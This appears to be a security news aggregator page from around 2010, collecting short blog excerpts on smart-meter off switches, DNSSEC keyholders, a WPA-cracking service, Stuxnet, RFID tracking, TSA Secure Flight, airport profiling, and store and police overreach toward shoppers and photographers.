webcoder.info(security); //

"Who controls the off switch?" by Ross Anderson and Shailendra Fuloria.

Abstract: We're about to acquire a significant new cybervulnerability. The world's energy utilities are starting to install hundreds of millions of 'smart meters' which contain a remote off switch. Its main purpose is to ensure that customers who default on their payments can be switched remotely to a prepay tariff; secondary purposes include supporting interruptible tariffs and implementing rolling power cuts at times of supply shortage.

The off switch creates information security problems of a kind, and on a scale, that the energy companies have not had to face before. From the viewpoint of a cyber attacker -- whether a hostile government agency, a terrorist organisation or even a militant environmental group -- the ideal attack on a target country is to interrupt its citizens' electricity supply. This is the cyber equivalent of a nuclear strike; when electricity stops, then pretty soon everything else does too. Until now, the only plausible ways to do that involved attacks on critical generation, transmission and distribution assets, which are increasingly well defended.

Smart meters change the game. The combination of commands that will cause meters to interrupt the supply, of applets and software upgrades that run in the meters, and of cryptographic keys that are used to authenticate these commands and software changes, create a new strategic vulnerability, which we discuss in this paper.

The two have another paper on the economics of smart meters. Blog post here.

From the Good Blog: Where Did the Money to Rebuild Iraq Go?

From the Special Inspector General for Iraq Reconstruction, July 27, 2010 (PDF):

Weaknesses in DoD's financial and management controls left it unable to properly account for $8.7 billion of the $9.1 billion in DFI funds it received for reconstruction activities in Iraq. This situation occurred because most DoD organizations receiving DFI funds did not establish the required Department of the Treasury accounts and no DoD organization was designated as the executive agent for managing the use of DFI funds. The breakdown in controls left the funds vulnerable to inappropriate uses and undetected loss.

The DNSSEC root key has been divided among seven people:

Part of ICANN's security scheme is the Domain Name System Security, a security protocol that ensures Web sites are registered and "signed" (this is the security measure built into the Web that ensures when you go to a URL you arrive at a real site and not an identical pirate site). Most major servers are a part of DNSSEC, as it's known, and during a major international attack, the system might sever connections between important servers to contain the damage.

A minimum of five of the seven keyholders -- one each from Britain, the U.S., Burkina Faso, Trinidad and Tobago, Canada, China, and the Czech Republic -- would have to converge at a U.S. base with their keys to restart the system and connect everything once again.

That's a secret sharing scheme they're using, most likely Shamir's Secret Sharing.
We know the names of some of them.

Paul Kane -- who lives in the Bradford-on-Avon area -- has been chosen to look after one of seven keys, which will 'restart the world wide web' in the event of a catastrophic event.

Dan Kaminsky is another.

I don't know how they picked those countries.

Okay, this is just weird:

Mark S. Price, a specialist in public security, and his privately held company, Paradise Lost Antiterrorism Network of America (www.plan-a.us), have recently applied to the United States Patent and Trademark Office for a Utility Patent on their Suicide Bomb Deterrent, a security device designed, manufactured and distributed by PLAN-A. This device has been designed to warn and deter potential fanatical religious suicide bomb-wielding terrorists from otherwise detonating an explosive charge within close proximity of said device, to the intended end of successfully accomplishing its namesake purpose of Suicide Bomb Deterrent and the protecting and preserving of all life and property otherwise in mortal and destructive danger.

Reading the partial patent application on their minimal website, it appears to be a packet of pork product, combined with a big sign saying something like: "Warning. If you blow up a bomb right here, you'll get pork stuff all over you before you die -- which might be suboptimal from a religious point of view."

This appears to not be a joke.

It's a service:

The mechanism used involves captured network traffic, which is uploaded to the WPA Cracker service and subjected to an intensive brute force cracking effort. As advertised on the site, what would be a five-day task on a dual-core PC is reduced to a job of about twenty minutes on average. For the more “premium” price of $35, you can get the job done in about half the time. Because it is a dictionary attack using a predefined 135-million-word list, there is no guarantee that you will crack the WPA key, but such an extensive dictionary attack should be sufficient for any but the most specialized penetration testing purposes.

[...]

It gets even better. If you try the standard 135-million-word dictionary and do not crack the WPA encryption on your target network, there is an extended dictionary that contains an additional 284 million words. In short, serious brute force wireless network encryption cracking has become a retail commodity.

FAQ here.

In related news, there might be a man-in-the-middle attack possible against the WPA2 protocol. Man-in-the-middle attacks are potentially serious, but it depends on the details -- and they're not available yet.

Here's a book from 1921 on how to profile people.

An article from The Economist makes a point that I have been thinking about for a while: the modern technology makes life harder for spies, not easier. It used to be the technology favored spycraft -- think James Bond gadgets -- but more and more, technology favors spycatchers. The ubiquitous collection of personal data makes it harder to maintain a false identity, ubiquitous eavesdropping makes it harder to communicate securely, the prevalence of cameras makes it harder to not be seen, and so on.

I think this an example of the general tendency of modern information and communications technology to increase power in proportion to existing power. So while technology makes the lone spy more effective, it makes an institutional counterspy organization much more powerful.

In an effort to better track inventory of its clothing items, Walmart is planning to start placing removable RFID tags on individual pairs of jeans and underwear. But some privacy advocates worry that the tags may allow unscrupulous types to learn more about your purchasing habits than you'd generally care to share.

The goal for Walmart is better inventory control. Having RFID tags placed on items, especially those available in different sizes, would allow employees to quickly scan each shelf with a hand-held device. They would then immediately know if the proper mix and quantity of each item is on the shelf.

Walmart says all RFID chips will be placed on easily removable tags that hang off the clothing like price tags.

But privacy advocates worry that even after the tags are removed, it would be incredibly easy for someone with the handheld scanner to roll down your street and scan your garbage to get an idea of what you're buying.

They also don't like the idea of retailers -- not necessarily just Walmart -- using RFID scanners to read personal info stored on the new generation of credit cards and driver's licenses that contain RFID chips.

Says an RFID-hater:

There are two things you really don't want to tag, clothing and identity documents, and ironically that's where we are seeing adoption... The inventory guys may be in the dark about this, but there are a lot of corporate marketers who are interested in tracking people as they walk sales floors.

Counters a brainiac from MIT:

Concerns about privacy are valid, but in this instance, the benefits far outweigh any concerns... The tags don't have any personal information. They are essentially barcodes with serial numbers attached. And you can easily remove them.

Perhaps Walmart should do what's being done in Europe -- or what retailers have done for years with those anti-theft devices -- and remove the RFID tags at the point of checkout.

Speaking of anti-theft devices, Wal-Mart says the RFID chips should cut down on employee theft because it will be easier to see if something's gone missing from the back room.

Wal-Mart Radio Tags to Track Clothing [WSJ via Newser.com]

The Transport Security Administration (TSA) has launched a new program called Secure Flight that aims to better protect you, but as usual it comes with yet another annoying detail to remember when planning your travel.

When booking a flight traveling to, from or within the United States the TSA will be checking your booking information against your ID or passport. This means the full name, date of birth, and gender you use to book your flight needs to be identical to that on your identification. With many travel sites retaining your personal data for later bookings, you should start updating your accounts to make things easier when making your travel plans. If your information doesn't match, you could be delayed or denied when you arrive at your airport's security checkpoint.

The advantage of this new program is that you'll know if you're on the no-fly list immediately after trying to book a ticket. The TSA's put together a FAQ and video to help clear up any confusion over these new policies. In most cases this won't cause too much trouble, but if you're making travel plans be sure to double-check that everything matches.

Note: It may also be worthwhile to call the specific airline you're booking with to check if any additional information is required. I've received a notification from one airline implying my address needs to match my ID, which may indicate future restrictions of the Secure Flight program (or may just be something JetBlue is doing).

Where do these TV shows come from?

Follows the adventures of the Cuylers, an impoverished and dysfunctional family of anthropomorphic, air-breathing, redneck squids who live in a rural Appalachian community in the US state of Georgia.

The Washington Post has published a phenomenal piece of investigative journalism: a long, detailed, and very interesting expose on the U.S. intelligence industry (overall website; parts 1, 2, and 3; blog; Washington reactions; top 10 revelations; many many many blog comments and reactions; and so on).

It's a truly excellent piece of investigative journalism. Pity people don't care much about investigative journalism -- or facts in politics, really -- anymore.

EDITED TO ADD (7/25): More commentary.

EDITED TO ADD (7/26): Jay Rosen writes:

Last week, it was the Washington Post's big series, Top Secret America, two years in the making. It reported on the massive security shadowland that has arisen since 09/11. The Post basically showed that there is no accountability, no knowledge at the center of what the system as a whole is doing, and too much "product" to make intelligent use of. We're wasting billions upon billions of dollars on an intelligence system that does not work. It's an explosive finding but the explosive reactions haven't followed, not because the series didn't do its job, but rather: the job of fixing what is broken would break the system responsible for such fixes.

The mental model on which most investigative journalism is based states that explosive revelations lead to public outcry; elites get the message and reform the system. But what if elites believe that reform is impossible because the problems are too big, the sacrifices too great, the public too distractible? What if cognitive dissonance has been insufficiently accounted for in our theories of how great journalism works...and often fails to work?

EDITED TO ADD (7/27): More.

Stuxnet is a new Internet worm that specifically targets Siemens WinCC SCADA systems: used to control production at industrial plants such as oil rigs, refineries, electronics production, and so on. The worm seems to uploads plant info (schematics and production information) to an external website. Moreover, owners of these SCADA systems cannot change the default password because it would cause the software to break down.

Interesting:

The use of profiling by ethnicity or nationality to trigger secondary security screening is a controversial social and political issue. Overlooked is the question of whether such actuarial methods are in fact mathematically justified, even under the most idealized assumptions of completely accurate prior probabilities, and secondary screenings concentrated on the highest-probablity individuals. We show here that strong profiling (defined as screening at least in proportion to prior probability) is no more efficient than uniform random sampling of the entire population, because resources are wasted on the repeated screening of higher probability, but innocent, individuals. A mathematically optimal strategy would be ''square-root biased sampling,'' the geometric mean between strong profiling and uniform sampling, with secondary screenings distributed broadly, although not uniformly, over the population. Square-root biased sampling is a general idea that can be applied whenever a ''bell-ringer'' event must be found by sampling with replacement, but can be recognized (either with certainty, or with some probability) when seen.

Andrew ran into an IKEA receipt checker who seemed to have used Paul Blart: Mall Cop as a training video. The un-uniformed shopping cop demanded to see his receipt, threatened his arrest if he didn't comply and made him sweat out the shakedown as he took an unreasonable amount of time.

He writes:

I was shopping at the [redacted] IKEA today and after going through the self check out a man not in any uniform (Ikea or otherwise) asked to see my receipt. What he said was " I need to see your receipt."

I complied and after about a minute I said, "you have another 10 seconds and then I am leaving." He replied with "you will let me finish." I demanded my receipt and he told me that "if you do not let me check you could be arrested". Needless to say I became irate and demanded both my receipt and a manager. He refused to give me the receipt and then pointed to a phone on the cashier podium and said "you can call the manager yourself."

We got into a yelling argument all the while he refused to give me the receipt. Finally an employee called a manager.

When the manager came, he had no name tag, refused his own name and told me "you have to let us check, if not you will go to jail."

I demanded his name and the name of the "security" person, both refused.

Finally after several minutes I was given my receipt. This can not be normal for Ikea to operate this way and detain people.

A reminder: Unless a store requires you to sign to a receipt-checking agreement under a membership or you're under a reasonable suspicion of shoplifting, you don't have to submit to store security forces on receipt-scanning power trips.

We've previously covered how, despite camera ubiquity, amateur and journalistic reports of police, security guards, and other authority figures of varying legitimacy intimidating harmless photographers continue to pop up. Popular Mechanics explains why this harassment isn't just wrong, but illegal.

Instances of such intimidation—misguided at best, but often outright thuggish—occur anywhere from shopping malls to public streets, and often go down when citizens attempt to document an arrest or other police action. And while Popular Mechanics' Glenn Harlan Reynolds notes that mall cops may have a legal basis for asking you to put your camera away, public property (such as any sidewalk, street, or municipal area) is always fair game.

Reynolds cites Bert Krages, an attorney specializing in photography law (very cool!), who explains "The general rule is that if something is in a public place, you're entitled to photograph it." And there's nothing in the the Patriot or Homeland Security acts that says otherwise, contrary to what a misinformed officer might try to tell you. You snapping a pic of a police traffic stop is no more a privacy violation than a wide-eyed tourist photographing a Times Square Sbarro.

But what about terrorism? Still not an excuse. As Bruce Schneier, head of security technology for British Telecom points out, the notion that terrorist conspirators photograph their targets is an overblown one: "Look at the 9/11 attacks, the Moscow and London subway bombings, the Fort Hood shooting—no photos." Rather, Reynolds argues, a camera in the hand of every pedestrian can only serve to foil potential plotters.

If you or someone you know is menaced by police who claim you're breaking the law by merely hitting the shutter, Reynolds advises to—politely—ask what legal authority they have to stop you, and to speak with a supervisor. But the only permanent fix will be an emphasis on educating guards and police, or the type of legislation recently introduced by Congressman Edolphus Towns.

Taking photos through your ex-girlfriend's window is still very, very illegal, however. [Popular Mechanics]
Images via stevendepolo, BAR Photography, and jason.kuffer